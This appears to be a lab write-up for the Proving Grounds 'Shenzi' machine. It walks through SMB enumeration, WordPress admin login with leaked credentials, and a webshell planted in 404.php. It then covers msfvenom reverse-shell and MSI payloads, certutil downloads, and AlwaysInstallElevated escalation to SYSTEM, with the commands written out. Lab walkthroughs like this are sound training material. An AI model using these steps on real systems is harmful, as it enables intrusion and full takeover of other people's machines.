PG Practice Shenzi Writeup


sudo nmap -p- -sV -sS 

21/tcp   open  ftp           FileZilla ftpd 0.9.41 beta
80/tcp   open  http          Apache httpd 2.4.43 
((Win64) OpenSSL/1.1.1g PHP/7.4.6)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.43 (
(Win64) OpenSSL/1.1.1g PHP/7.4.6)
445/tcp  open  microsoft-ds?
3306/tcp open  mysql?
5040/tcp open  unknown

As SMB is open we can run smbclient with no credentials to see if we can connect.

smbclient -U ''  -L \\\\\\ 

After running the above command smbclient returns results showing a share called 'Shenzi'. We can connect to the share and then view the contents with the dir command.

smbclient -U ''  \\\\\\Shenzi 

From here I set the recurse command and prompt off before downloading all files for an easy single line download.

The contents of passwords.txt of course proved to be interesting.

Out of all of the credentials above the Wordpress one was potentially the most interesting considering further checks for phpmyadmin and webdav showed either the services are not running or inaccessible outside of local access on the target machine.

Running against port 80 showed no interesting directories discovered.

Knowing that Wordpress is potentially installed and that Wordpress sites do not generally have to exist in the directory of /wordpress/ I tried the Machine and SMB share name of Shenzi on port 80.

Now that we have a valid Wordpress site and some credentials we can try logging in. Heading over to I was able to login with the credentials of admin:FeltHeadwallWight357

Heading over to Appearance > Theme editor I was able to edit the contents of the 404.php file and insert a webshell.

After saving changes and browsing to we can see we now have a webshell and confirmed command execution.

From here I created a msfvenom reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=8082 -f exe > /home/kali/windows/reverseshell.exe

Uploaded the file with the PHP webshell and set a netcat listener on port 21. After uploading the shell through the webshell I then executed and recieved a shell back.

After some initial enumeration I was unable to find anything interesting. I then turned to winpeas to look for any quick wins. Shortly after running I came into:

With this we can create a malicious MSI file with msfvenom and when executed will be run in the context of SYSTEM.

First create a reverse shell MSI.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=21 -f msi > /home/kali/windows/priv.msi

Then set up a netcat listener on the attacking machine. Then using certutil.exe I downloaded the MSI and executed.

Then received a shell on the listener as SYSTEM.

Last updated